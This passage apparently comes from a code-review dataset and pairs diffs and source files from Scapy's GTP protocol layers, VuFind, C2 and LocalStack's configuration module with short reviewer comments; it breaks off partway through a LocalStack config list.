1 is currently supported TBCDByteField("MCC", "", 2), # MNC: if the third digit of MCC is 0xf, then the length of MNC is 1 byte # noqa: E501 TBCDByteField("MNC", "", 1), ShortField("LAC", None), ShortField("SAC", None)] class IE_MSTimeZone(IE_Base): name = "MS Time Zone" fields_desc = [ByteEnumField("ietype", 153, IEType), ShortField("length", None), ByteField("timezone", 0), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), XBitField("daylight_saving_time", 0x00, 2)] class IE_IMEI(IE_Base): name = "IMEI" fields_desc = [ByteEnumField("ietype", 154, IEType), ShortField("length", None), TBCDByteField("IMEI", "", length_from=lambda x: x.length)] class IE_MSInfoChangeReportingAction(IE_Base): name = "MS Info Change Reporting Action" fields_desc = [ByteEnumField("ietype", 181, IEType), ShortField("length", 1), ByteField("Action", 0)] class IE_DirectTunnelFlags(IE_Base): name = "Direct Tunnel Flags" fields_desc = [ByteEnumField("ietype", 182, IEType), ShortField("length", 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("EI", 0, 1), BitField("GCSI", 0, 1), BitField("DTI", 0, 1)] class IE_BearerControlMode(IE_Base): name = "Bearer Control Mode" fields_desc = [ByteEnumField("ietype", 184, IEType), ShortField("length", 1), ByteField("bearer_control_mode", 0)] class IE_EvolvedAllocationRetentionPriority(IE_Base): name = "Evolved Allocation/Retention Priority" fields_desc = [ByteEnumField("ietype", 191, IEType), ShortField("length", 1), BitField("Spare", 0, 1), BitField("PCI", 0, 1), XBitField("PL", 0x0000, 4), BitField("Spare", 0, 1), BitField("PVI", 0, 1)] class IE_CharginGatewayAddress(IE_Base): name = "Chargin Gateway Address" fields_desc = [ByteEnumField("ietype", 251, IEType), ShortField("length", 4), ConditionalField(IPField("ipv4_address", "127.0.0.1"), lambda pkt: pkt.length == 4), ConditionalField(IP6Field("ipv6_address", "::1"), lambda pkt: pkt.length == 16)] class IE_PrivateExtension(IE_Base): name = "Private Extension" fields_desc = [ByteEnumField("ietype", 255, IEType), ShortField("length", 1), ByteField("extension identifier", 0), StrLenField("extention_value", "", length_from=lambda x: x.length)] class IE_ExtensionHeaderList(IE_Base): name = "Extension Header List" fields_desc = [ByteEnumField("ietype", 141, IEType), FieldLenField("length", None, length_of="extension_headers"), # noqa: E501 FieldListField("extension_headers", [64, 192], ByteField("", 0))] # noqa: E501 class IE_NotImplementedTLV(Packet): name = "IE not implemented" fields_desc = [ByteEnumField("ietype", 0, IEType), ShortField("length", None), StrLenField("data", "", length_from=lambda x: x.length)] def extract_padding(self, pkt): return "", pkt ietypecls = {1: IE_Cause, 2: IE_IMSI, 3: IE_Routing, 8: IE_ReorderingRequired, 14: IE_Recovery, 15: IE_SelectionMode, 16: IE_TEIDI, 17: IE_TEICP, 19: IE_Teardown, 20: IE_NSAPI, 26: IE_ChargingCharacteristics, 27: IE_TraceReference, 28: IE_TraceType, 127: IE_ChargingId, 128: IE_EndUserAddress, 131: IE_AccessPointName, 132: IE_ProtocolConfigurationOptions, 133: IE_GSNAddress, 134: IE_MSInternationalNumber, 135: IE_QoS, 141: IE_ExtensionHeaderList, 148: IE_CommonFlags, 149: IE_APNRestriction, 151: IE_RATType, 152: IE_UserLocationInformation, 153: IE_MSTimeZone, 154: IE_IMEI, 181: IE_MSInfoChangeReportingAction, 182: IE_DirectTunnelFlags, 184: IE_BearerControlMode, 191: IE_EvolvedAllocationRetentionPriority, 251: IE_CharginGatewayAddress, 255: IE_PrivateExtension} def IE_Dispatcher(s): """Choose the correct Information Element class.""" if len(s) < 1: return Raw(s) # Get the IE type ietype = orb(s[0]) cls = ietypecls.get(ietype, Raw) # if ietype greater than 128 are TLVs if cls == Raw and ietype & 128 == 128: cls = IE_NotImplementedTLV return cls(s) class GTPEchoResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Echo Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) def answers(self, other): return self.seq == other.seq class GTPCreatePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Create PDP Context Request" fields_desc = [PacketListField("IE_list", [IE_TEIDI(), IE_NSAPI(), IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 IE_NotImplementedTLV(ietype=135, length=15, data=RandString(15))], # noqa: E501 IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) class GTPCreatePDPContextResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Create PDP Context Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) def answers(self, other): return self.seq == other.seq class GTPUpdatePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Update PDP Context Request" fields_desc = [PacketListField("IE_list", [ IE_Cause(), IE_Recovery(), IE_TEIDI(), IE_TEICP(), IE_ChargingId(), IE_ProtocolConfigurationOptions(), IE_GSNAddress(), IE_GSNAddress(), IE_GSNAddress(), IE_GSNAddress(), IE_QoS(), IE_CharginGatewayAddress(), IE_CharginGatewayAddress(), IE_CommonFlags(), IE_APNRestriction(), IE_BearerControlMode(), IE_MSInfoChangeReportingAction(), IE_EvolvedAllocationRetentionPriority(), IE_PrivateExtension()], IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) class GTPUpdatePDPContextResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Update PDP Context Response" fields_desc = [PacketListField("IE_list", None, IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) class GTPErrorIndication(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Error Indication" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] class GTPDeletePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Delete PDP Context Request" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] class GTPDeletePDPContextResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Delete PDP Context Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] class GTPPDUNotificationRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP PDU Notification Request" fields_desc = [PacketListField("IE_list", [IE_IMSI(), IE_TEICP(TEICI=RandInt()), IE_EndUserAddress(PDPTypeNumber=0x21), # noqa: E501 IE_AccessPointName(), IE_GSNAddress(ipv4_address="127.0.0.1"), # noqa: E501 ], IE_Dispatcher)] class GTPSupportedExtensionHeadersNotification(Packet): name = "GTP Supported Extension Headers Notification" fields_desc = [PacketListField("IE_list", [IE_ExtensionHeaderList(), ], IE_Dispatcher)] class GTPmorethan1500(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP More than 1500" fields_desc = [ByteEnumField("IE_Cause", "Cause", IEType), BitField("IE", 1, 12000), ] # Bind GTP-C bind_bottom_up(UDP, GTPHeader, dport=2123) bind_bottom_up(UDP, GTPHeader, sport=2123) bind_layers(UDP, GTPHeader, dport=2123, sport=2123) bind_layers(GTPHeader, GTPEchoRequest, gtp_type=1, S=1) bind_layers(GTPHeader, GTPEchoResponse, gtp_type=2, S=1) bind_layers(GTPHeader, GTPCreatePDPContextRequest, gtp_type=16) bind_layers(GTPHeader, GTPCreatePDPContextResponse, gtp_type=17) bind_layers(GTPHeader, GTPUpdatePDPContextRequest, gtp_type=18) bind_layers(GTPHeader, GTPUpdatePDPContextResponse, gtp_type=19) bind_layers(GTPHeader, GTPDeletePDPContextRequest, gtp_type=20) bind_layers(GTPHeader, GTPDeletePDPContextResponse, gtp_type=21) bind_layers(GTPHeader, GTPPDUNotificationRequest, gtp_type=27) bind_layers(GTPHeader, GTPSupportedExtensionHeadersNotification, gtp_type=31, S=1) # noqa: E501 bind_layers(GTPHeader, GTP_UDPPort_ExtensionHeader, next_ex=64, E=1) bind_layers(GTPHeader, GTP_PDCP_PDU_ExtensionHeader, next_ex=192, E=1) # Bind GTP-U bind_bottom_up(UDP, GTP_U_Header, dport=2152) bind_bottom_up(UDP, GTP_U_Header, sport=2152) bind_layers(UDP, GTP_U_Header, dport=2152, sport=2152) bind_layers(GTP_U_Header, GTPErrorIndication, gtp_type=26, S=1) bind_layers(GTP_U_Header, GTPPDUSessionContainer, gtp_type=255, E=1, next_ex=0x85) bind_top_down(GTP_U_Header, IP, gtp_type=255) bind_top_down(GTP_U_Header, IPv6, gtp_type=255) bind_top_down(GTP_U_Header, PPP, gtp_type=255)
1
17,405
You probably don't want to assume that `self.underlayer` has a `seq` attribute.
secdev-scapy
py
@@ -65,10 +65,6 @@ class DisplayLanguageOptionFactory implements FactoryInterface if (!empty($options)) { throw new \Exception('Unexpected options sent to factory.'); } - // We want to construct a separate translator instance for this helper, - // since it configures different language/locale than the core shared - // instance! - $factory = new \VuFind\I18n\Translator\TranslatorFactory(); - return new $requestedName($factory($container, Translator::class)); + return new $requestedName($container->get(Translator::class)); } }
1
<?php /** * DisplayLanguageOption helper factory. * * PHP version 7 * * Copyright (C) Villanova University 2018. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2, * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * * @category VuFind * @package View_Helpers * @author Demian Katz <[email protected]> * @license http://opensource.org/licenses/gpl-2.0.php GNU General Public License * @link https://vufind.org/wiki/development Wiki */ namespace VuFind\View\Helper\Root; use Interop\Container\ContainerInterface; use Interop\Container\Exception\ContainerException; use Laminas\Mvc\I18n\Translator; use Laminas\ServiceManager\Exception\ServiceNotCreatedException; use Laminas\ServiceManager\Exception\ServiceNotFoundException; use Laminas\ServiceManager\Factory\FactoryInterface; /** * DisplayLanguageOption helper factory. * * @category VuFind * @package View_Helpers * @author Demian Katz <[email protected]> * @license http://opensource.org/licenses/gpl-2.0.php GNU General Public License * @link https://vufind.org/wiki/development Wiki */ class DisplayLanguageOptionFactory implements FactoryInterface { /** * Create an object * * @param ContainerInterface $container Service manager * @param string $requestedName Service being created * @param null|array $options Extra options (optional) * * @return object * * @throws ServiceNotFoundException if unable to resolve the service. * @throws ServiceNotCreatedException if an exception is raised when * creating a service. * @throws ContainerException&\Throwable if any other error occurs */ public function __invoke(ContainerInterface $container, $requestedName, array $options = null ) { if (!empty($options)) { throw new \Exception('Unexpected options sent to factory.'); } // We want to construct a separate translator instance for this helper, // since it configures different language/locale than the core shared // instance! $factory = new \VuFind\I18n\Translator\TranslatorFactory(); return new $requestedName($factory($container, Translator::class)); } }
1
31,547
This apparently breaks the language selection.
vufind-org-vufind
php
@@ -0,0 +1,10 @@ +# This migration comes from acts_as_taggable_on_engine (originally 5) +# This migration is added to circumvent issue #623 and have special characters +# work properly +class ChangeCollationForTagNames < ActiveRecord::Migration + def up + if ActsAsTaggableOn::Utils.using_mysql? + execute("ALTER TABLE tags MODIFY name varchar(255) CHARACTER SET utf8 COLLATE utf8_bin;") + end + end +end
1
1
15,431
since we're not using mysql, do we need this migration?
18F-C2
rb
@@ -453,6 +453,9 @@ OUTBOUND_HTTP_PROXY = os.environ.get("OUTBOUND_HTTP_PROXY", "") # Equivalent to HTTPS_PROXY, but only applicable for external connections OUTBOUND_HTTPS_PROXY = os.environ.get("OUTBOUND_HTTPS_PROXY", "") +# Whether to enable the partition adjustment listener (in order to support other partitions that the default) +PARTITION_ADJUSTMENT = is_env_true("PARTITION_ADJUSTMENT") + # list of environment variable names used for configuration. # Make sure to keep this in sync with the above! # Note: do *not* include DATA_DIR in this list, as it is treated separately
1
import logging import os import platform import re import socket import subprocess import tempfile import time from typing import Any, Dict, List, Mapping, Tuple import six from boto3 import Session from localstack.constants import ( AWS_REGION_US_EAST_1, DEFAULT_BUCKET_MARKER_LOCAL, DEFAULT_DEVELOP_PORT, DEFAULT_LAMBDA_CONTAINER_REGISTRY, DEFAULT_PORT_EDGE, DEFAULT_SERVICE_PORTS, FALSE_STRINGS, INSTALL_DIR_INFRA, LOCALHOST, LOCALHOST_IP, LOG_LEVELS, TRACE_LOG_LEVELS, TRUE_STRINGS, ) # keep track of start time, for performance debugging load_start_time = time.time() class Directories: """ Holds the different directories available to localstack. Some directories are shared between the host and the localstack container, some live only on the host and some only in the container. Attributes: static_libs: container only; binaries and libraries statically packaged with the image var_libs: shared; binaries and libraries+data computed at runtime: lazy-loaded binaries, ssl cert, ... cache: shared; ephemeral data that has to persist across localstack runs and reboots tmp: shared; ephemeral data that has to persist across localstack runs but not reboots functions: shared; volume to communicate between host<->lambda containers data: shared; holds localstack state, pods, ... config: host only; pre-defined configuration values, cached credentials, machine id, ... init: shared; user-defined provisioning scripts executed in the container when it starts logs: shared; log files produced by localstack """ static_libs: str var_libs: str cache: str tmp: str functions: str data: str config: str init: str logs: str # these are the folders mounted into the container by default when the CLI is used default_bind_mounts = ["var_libs", "cache", "tmp", "data", "init", "logs"] def __init__( self, static_libs: str = None, var_libs: str = None, cache: str = None, tmp: str = None, functions: str = None, data: str = None, config: str = None, init: str = None, logs: str = None, ) -> None: super().__init__() self.static_libs = static_libs self.var_libs = var_libs self.cache = cache self.tmp = tmp self.functions = functions self.data = data self.config = config self.init = init self.logs = logs @staticmethod def from_config(): """Returns Localstack directory paths from the config/environment variables defined by the config.""" return Directories( static_libs=INSTALL_DIR_INFRA, var_libs=TMP_FOLDER, # TODO: add variable cache=CACHE_DIR, tmp=TMP_FOLDER, # TODO: should inherit from root value for /var/lib/localstack (e.g., MOUNT_ROOT) functions=HOST_TMP_FOLDER, # TODO: rename variable/consider a volume data=DATA_DIR, config=CONFIG_DIR, init=None, # TODO: introduce environment variable logs=TMP_FOLDER, # TODO: add variable ) @staticmethod def for_container() -> "Directories": """ Returns Localstack directory paths as they are defined within the container. Everything shared and writable lives in /var/lib/localstack or /tmp/localstack. :returns: Directories object """ # only set CONTAINER_VAR_LIBS_FOLDER/CONTAINER_CACHE_FOLDER inside the container to redirect var_libs/cache to # another directory to avoid override by host mount var_libs = ( os.environ.get("CONTAINER_VAR_LIBS_FOLDER", "").strip() or "/var/lib/localstack/var_libs" ) cache = os.environ.get("CONTAINER_CACHE_FOLDER", "").strip() or "/var/lib/localstack/cache" return Directories( static_libs=INSTALL_DIR_INFRA, var_libs=var_libs, cache=cache, tmp=TMP_FOLDER, # TODO: move to /var/lib/localstack/tmp - or /tmp/localstack functions=HOST_TMP_FOLDER, # TODO: move to /var/lib/localstack/tmp data=DATA_DIR, # TODO: move to /var/lib/localstack/data config=None, # config directory is host-only logs="/var/lib/localstack/logs", init="/docker-entrypoint-initaws.d", ) def mkdirs(self): for folder in [ self.static_libs, self.var_libs, self.cache, self.tmp, self.functions, self.data, self.config, self.init, self.logs, ]: if folder and not os.path.exists(folder): try: os.makedirs(folder) except Exception: # this can happen due to a race condition when starting # multiple processes in parallel. Should be safe to ignore pass def __str__(self): return str(self.__dict__) def eval_log_type(env_var_name): """get the log type from environment variable""" ls_log = os.environ.get(env_var_name, "").lower().strip() return ls_log if ls_log in LOG_LEVELS else False def is_env_true(env_var_name): """Whether the given environment variable has a truthy value.""" return os.environ.get(env_var_name, "").lower().strip() in TRUE_STRINGS def is_env_not_false(env_var_name): """Whether the given environment variable is empty or has a truthy value.""" return os.environ.get(env_var_name, "").lower().strip() not in FALSE_STRINGS def load_environment(profile: str = None): """Loads the environment variables from ~/.localstack/{profile}.env :param profile: the profile to load (defaults to "default") """ if not profile: profile = "default" path = os.path.join(CONFIG_DIR, f"{profile}.env") if not os.path.exists(path): return import dotenv dotenv.load_dotenv(path, override=False) # the configuration profile to load CONFIG_PROFILE = os.environ.get("CONFIG_PROFILE", "").strip() # host configuration directory CONFIG_DIR = os.environ.get("CONFIG_DIR", os.path.expanduser("~/.localstack")) # keep this on top to populate environment try: load_environment(CONFIG_PROFILE) except ImportError: # dotenv may not be available in lambdas or other environments where config is loaded pass # java options to Lambda LAMBDA_JAVA_OPTS = os.environ.get("LAMBDA_JAVA_OPTS", "").strip() # limit in which to kinesalite will start throwing exceptions KINESIS_SHARD_LIMIT = os.environ.get("KINESIS_SHARD_LIMIT", "").strip() or "100" # delay in kinesalite response when making changes to streams KINESIS_LATENCY = os.environ.get("KINESIS_LATENCY", "").strip() or "500" # Kinesis provider - either "kinesis-mock" or "kinesalite" KINESIS_PROVIDER = os.environ.get("KINESIS_PROVIDER") or "kinesis-mock" # default AWS region if "DEFAULT_REGION" not in os.environ: os.environ["DEFAULT_REGION"] = os.environ.get("AWS_DEFAULT_REGION") or AWS_REGION_US_EAST_1 DEFAULT_REGION = os.environ["DEFAULT_REGION"] # Whether or not to handle lambda event sources as synchronous invocations SYNCHRONOUS_SNS_EVENTS = is_env_true("SYNCHRONOUS_SNS_EVENTS") SYNCHRONOUS_SQS_EVENTS = is_env_true("SYNCHRONOUS_SQS_EVENTS") SYNCHRONOUS_API_GATEWAY_EVENTS = is_env_not_false("SYNCHRONOUS_API_GATEWAY_EVENTS") SYNCHRONOUS_KINESIS_EVENTS = is_env_not_false("SYNCHRONOUS_KINESIS_EVENTS") SYNCHRONOUS_DYNAMODB_EVENTS = is_env_not_false("SYNCHRONOUS_DYNAMODB_EVENTS") # randomly inject faults to Kinesis KINESIS_ERROR_PROBABILITY = float(os.environ.get("KINESIS_ERROR_PROBABILITY", "").strip() or 0.0) # randomly inject faults to DynamoDB DYNAMODB_ERROR_PROBABILITY = float(os.environ.get("DYNAMODB_ERROR_PROBABILITY", "").strip() or 0.0) DYNAMODB_READ_ERROR_PROBABILITY = float( os.environ.get("DYNAMODB_READ_ERROR_PROBABILITY", "").strip() or 0.0 ) DYNAMODB_WRITE_ERROR_PROBABILITY = float( os.environ.get("DYNAMODB_WRITE_ERROR_PROBABILITY", "").strip() or 0.0 ) # JAVA EE heap size for dynamodb DYNAMODB_HEAP_SIZE = os.environ.get("DYNAMODB_HEAP_SIZE", "").strip() or "256m" # expose services on a specific host externally HOSTNAME_EXTERNAL = os.environ.get("HOSTNAME_EXTERNAL", "").strip() or LOCALHOST # expose SQS on a specific port externally SQS_PORT_EXTERNAL = int(os.environ.get("SQS_PORT_EXTERNAL") or 0) # name of the host under which the LocalStack services are available LOCALSTACK_HOSTNAME = os.environ.get("LOCALSTACK_HOSTNAME", "").strip() or LOCALHOST # host under which the LocalStack services are available from Lambda Docker containers HOSTNAME_FROM_LAMBDA = os.environ.get("HOSTNAME_FROM_LAMBDA", "").strip() # whether to remotely copy the lambda code or locally mount a volume LAMBDA_REMOTE_DOCKER = is_env_true("LAMBDA_REMOTE_DOCKER") # Marker name to indicate that a bucket represents the local file system. This is used for testing # Serverless applications where we mount the Lambda code directly into the container from the host OS. BUCKET_MARKER_LOCAL = ( os.environ.get("BUCKET_MARKER_LOCAL", "").strip() or DEFAULT_BUCKET_MARKER_LOCAL ) # network that the docker lambda container will be joining LAMBDA_DOCKER_NETWORK = os.environ.get("LAMBDA_DOCKER_NETWORK", "").strip() # custom DNS server that the docker lambda container will use LAMBDA_DOCKER_DNS = os.environ.get("LAMBDA_DOCKER_DNS", "").strip() # additional flags passed to Lambda Docker run/create commands LAMBDA_DOCKER_FLAGS = os.environ.get("LAMBDA_DOCKER_FLAGS", "").strip() # default container registry for lambda execution images LAMBDA_CONTAINER_REGISTRY = ( os.environ.get("LAMBDA_CONTAINER_REGISTRY", "").strip() or DEFAULT_LAMBDA_CONTAINER_REGISTRY ) # whether to remove containers after Lambdas finished executing LAMBDA_REMOVE_CONTAINERS = ( os.environ.get("LAMBDA_REMOVE_CONTAINERS", "").lower().strip() not in FALSE_STRINGS ) # directory for persisting data DATA_DIR = os.environ.get("DATA_DIR", "").strip() # folder for temporary files and data TMP_FOLDER = os.path.join(tempfile.gettempdir(), "localstack") # fix for Mac OS, to be able to mount /var/folders in Docker if TMP_FOLDER.startswith("/var/folders/") and os.path.exists("/private%s" % TMP_FOLDER): TMP_FOLDER = "/private%s" % TMP_FOLDER # temporary folder of the host (required when running in Docker). Fall back to local tmp folder if not set HOST_TMP_FOLDER = os.environ.get("HOST_TMP_FOLDER", TMP_FOLDER) # ephemeral cache dir that persists over reboots CACHE_DIR = os.environ.get("CACHE_DIR", os.path.join(TMP_FOLDER, "cache")).strip() # whether to enable verbose debug logging LS_LOG = eval_log_type("LS_LOG") DEBUG = is_env_true("DEBUG") or LS_LOG in TRACE_LOG_LEVELS # whether to enable debugpy DEVELOP = is_env_true("DEVELOP") # PORT FOR DEBUGGER DEVELOP_PORT = int(os.environ.get("DEVELOP_PORT", "").strip() or DEFAULT_DEVELOP_PORT) # whether to make debugpy wait for a debbuger client WAIT_FOR_DEBUGGER = is_env_true("WAIT_FOR_DEBUGGER") # whether to use SSL encryption for the services # TODO: this is deprecated and should be removed (edge port supports HTTP/HTTPS multiplexing) USE_SSL = is_env_true("USE_SSL") # whether to use the legacy single-region mode, defined via DEFAULT_REGION USE_SINGLE_REGION = is_env_true("USE_SINGLE_REGION") # whether to run in TF compatibility mode for TF integration tests # (e.g., returning verbatim ports for ELB resources, rather than edge port 4566, etc.) TF_COMPAT_MODE = is_env_true("TF_COMPAT_MODE") # default encoding used to convert strings to byte arrays (mainly for Python 3 compatibility) DEFAULT_ENCODING = "utf-8" # path to local Docker UNIX domain socket DOCKER_SOCK = os.environ.get("DOCKER_SOCK", "").strip() or "/var/run/docker.sock" # additional flags to pass to "docker run" when starting the stack in Docker DOCKER_FLAGS = os.environ.get("DOCKER_FLAGS", "").strip() # command used to run Docker containers (e.g., set to "sudo docker" to run as sudo) DOCKER_CMD = os.environ.get("DOCKER_CMD", "").strip() or "docker" # use the command line docker client instead of the new sdk version, might get removed in the future LEGACY_DOCKER_CLIENT = is_env_true("LEGACY_DOCKER_CLIENT") # whether to forward edge requests in-memory (instead of via proxy servers listening on backend ports) # TODO: this will likely become the default and may get removed in the future FORWARD_EDGE_INMEM = True # Default bind address for the edge service EDGE_BIND_HOST = os.environ.get("EDGE_BIND_HOST", "").strip() or "127.0.0.1" # port number for the edge service, the main entry point for all API invocations EDGE_PORT = int(os.environ.get("EDGE_PORT") or 0) or DEFAULT_PORT_EDGE # fallback port for non-SSL HTTP edge service (in case HTTPS edge service cannot be used) EDGE_PORT_HTTP = int(os.environ.get("EDGE_PORT_HTTP") or 0) # optional target URL to forward all edge requests to EDGE_FORWARD_URL = os.environ.get("EDGE_FORWARD_URL", "").strip() # IP of the docker bridge used to enable access between containers DOCKER_BRIDGE_IP = os.environ.get("DOCKER_BRIDGE_IP", "").strip() # whether to enable API-based updates of configuration variables at runtime ENABLE_CONFIG_UPDATES = is_env_true("ENABLE_CONFIG_UPDATES") # CORS settings DISABLE_CORS_CHECKS = is_env_true("DISABLE_CORS_CHECKS") DISABLE_CUSTOM_CORS_S3 = is_env_true("DISABLE_CUSTOM_CORS_S3") DISABLE_CUSTOM_CORS_APIGATEWAY = is_env_true("DISABLE_CUSTOM_CORS_APIGATEWAY") EXTRA_CORS_ALLOWED_HEADERS = os.environ.get("EXTRA_CORS_ALLOWED_HEADERS", "").strip() EXTRA_CORS_EXPOSE_HEADERS = os.environ.get("EXTRA_CORS_EXPOSE_HEADERS", "").strip() EXTRA_CORS_ALLOWED_ORIGINS = os.environ.get("EXTRA_CORS_ALLOWED_ORIGINS", "").strip() # whether to disable publishing events to the API DISABLE_EVENTS = is_env_true("DISABLE_EVENTS") DEBUG_ANALYTICS = is_env_true("DEBUG_ANALYTICS") # whether to eagerly start services EAGER_SERVICE_LOADING = is_env_true("EAGER_SERVICE_LOADING") # Whether to skip downloading additional infrastructure components (e.g., custom Elasticsearch versions) SKIP_INFRA_DOWNLOADS = os.environ.get("SKIP_INFRA_DOWNLOADS", "").strip() # whether to enable legacy record&replay persistence mechanism (default true, but will be disabled in a future release!) LEGACY_PERSISTENCE = is_env_not_false("LEGACY_PERSISTENCE") # Adding Stepfunctions default port LOCAL_PORT_STEPFUNCTIONS = int(os.environ.get("LOCAL_PORT_STEPFUNCTIONS") or 8083) # Stepfunctions lambda endpoint override STEPFUNCTIONS_LAMBDA_ENDPOINT = os.environ.get("STEPFUNCTIONS_LAMBDA_ENDPOINT", "").strip() # path prefix for windows volume mounting WINDOWS_DOCKER_MOUNT_PREFIX = os.environ.get("WINDOWS_DOCKER_MOUNT_PREFIX", "/host_mnt") # name of the main Docker container MAIN_CONTAINER_NAME = os.environ.get("MAIN_CONTAINER_NAME", "").strip() or "localstack_main" # the latest commit id of the repository when the docker image was created LOCALSTACK_BUILD_GIT_HASH = os.environ.get("LOCALSTACK_BUILD_GIT_HASH", "").strip() or None # the date on which the docker image was created LOCALSTACK_BUILD_DATE = os.environ.get("LOCALSTACK_BUILD_DATE", "").strip() or None # whether to skip S3 presign URL signature validation (TODO: currently enabled, until all issues are resolved) S3_SKIP_SIGNATURE_VALIDATION = is_env_not_false("S3_SKIP_SIGNATURE_VALIDATION") # whether to skip waiting for the infrastructure to shut down, or exit immediately FORCE_SHUTDOWN = is_env_not_false("FORCE_SHUTDOWN") # whether the in_docker check should always return true OVERRIDE_IN_DOCKER = is_env_true("OVERRIDE_IN_DOCKER") # whether to return mocked success responses for still unimplemented API methods MOCK_UNIMPLEMENTED = is_env_true("MOCK_UNIMPLEMENTED") def has_docker(): try: with open(os.devnull, "w") as devnull: subprocess.check_output("docker ps", stderr=devnull, shell=True) return True except Exception: return False def is_linux(): return platform.system() == "Linux" # whether to use Lambda functions in a Docker container LAMBDA_EXECUTOR = os.environ.get("LAMBDA_EXECUTOR", "").strip() if not LAMBDA_EXECUTOR: LAMBDA_EXECUTOR = "docker" if not has_docker(): LAMBDA_EXECUTOR = "local" # Fallback URL to use when a non-existing Lambda is invoked. If this matches # `dynamodb://<table_name>`, then the invocation is recorded in the corresponding # DynamoDB table. If this matches `http(s)://...`, then the Lambda invocation is # forwarded as a POST request to that URL. LAMBDA_FALLBACK_URL = os.environ.get("LAMBDA_FALLBACK_URL", "").strip() # Forward URL used to forward any Lambda invocations to an external # endpoint (can use useful for advanced test setups) LAMBDA_FORWARD_URL = os.environ.get("LAMBDA_FORWARD_URL", "").strip() # Time in seconds to wait at max while extracting Lambda code. # By default, it is 25 seconds for limiting the execution time # to avoid client/network timeout issues LAMBDA_CODE_EXTRACT_TIME = int(os.environ.get("LAMBDA_CODE_EXTRACT_TIME") or 25) # A comma-delimited string of stream names and its corresponding shard count to # initialize during startup. # For example: "my-first-stream:1,my-other-stream:2,my-last-stream:1" KINESIS_INITIALIZE_STREAMS = os.environ.get("KINESIS_INITIALIZE_STREAMS", "").strip() # URL to a custom elasticsearch backend cluster. If this is set to a valid URL, then localstack will not create # elasticsearch cluster instances, but instead forward all domains to the given backend. ES_CUSTOM_BACKEND = os.environ.get("ES_CUSTOM_BACKEND", "").strip() # Strategy used when creating elasticsearch domain endpoints routed through the edge proxy # valid values: domain | path | off ES_ENDPOINT_STRATEGY = os.environ.get("ES_ENDPOINT_STRATEGY", "").strip() or "domain" # Whether to start one cluster per domain (default), or multiplex domains to a single clusters ES_MULTI_CLUSTER = is_env_not_false("ES_MULTI_CLUSTER") # Equivalent to HTTP_PROXY, but only applicable for external connections OUTBOUND_HTTP_PROXY = os.environ.get("OUTBOUND_HTTP_PROXY", "") # Equivalent to HTTPS_PROXY, but only applicable for external connections OUTBOUND_HTTPS_PROXY = os.environ.get("OUTBOUND_HTTPS_PROXY", "") # list of environment variable names used for configuration. # Make sure to keep this in sync with the above! # Note: do *not* include DATA_DIR in this list, as it is treated separately CONFIG_ENV_VARS = [ "SERVICES", "HOSTNAME", "HOSTNAME_EXTERNAL", "LOCALSTACK_HOSTNAME", "LAMBDA_FALLBACK_URL", "LAMBDA_EXECUTOR", "LAMBDA_REMOTE_DOCKER", "LAMBDA_DOCKER_NETWORK", "LAMBDA_REMOVE_CONTAINERS", "USE_SSL", "USE_SINGLE_REGION", "DEBUG", "KINESIS_ERROR_PROBABILITY", "DYNAMODB_ERROR_PROBABILITY", "DYNAMODB_READ_ERROR_PROBABILITY", "DYNAMODB_WRITE_ERROR_PROBABILITY", "ES_CUSTOM_BACKEND", "ES_ENDPOINT_STRATEGY", "ES_MULTI_CLUSTER", "DOCKER_BRIDGE_IP", "DEFAULT_REGION", "LAMBDA_JAVA_OPTS", "LOCALSTACK_API_KEY", "LAMBDA_CONTAINER_REGISTRY", "TEST_AWS_ACCOUNT_ID", "DISABLE_EVENTS", "EDGE_PORT", "LS_LOG", "EDGE_PORT_HTTP", "EDGE_FORWARD_URL", "SKIP_INFRA_DOWNLOADS", "STEPFUNCTIONS_LAMBDA_ENDPOINT", "WINDOWS_DOCKER_MOUNT_PREFIX", "HOSTNAME_FROM_LAMBDA", "LOG_LICENSE_ISSUES", "SYNCHRONOUS_API_GATEWAY_EVENTS", "SYNCHRONOUS_KINESIS_EVENTS", "BUCKET_MARKER_LOCAL", "SYNCHRONOUS_SNS_EVENTS", "SYNCHRONOUS_SQS_EVENTS", "SYNCHRONOUS_DYNAMODB_EVENTS", "DYNAMODB_HEAP_SIZE", "MAIN_CONTAINER_NAME", "LAMBDA_DOCKER_DNS", "PERSISTENCE_SINGLE_FILE", "S3_SKIP_SIGNATURE_VALIDATION", "DEVELOP", "DEVELOP_PORT", "WAIT_FOR_DEBUGGER", 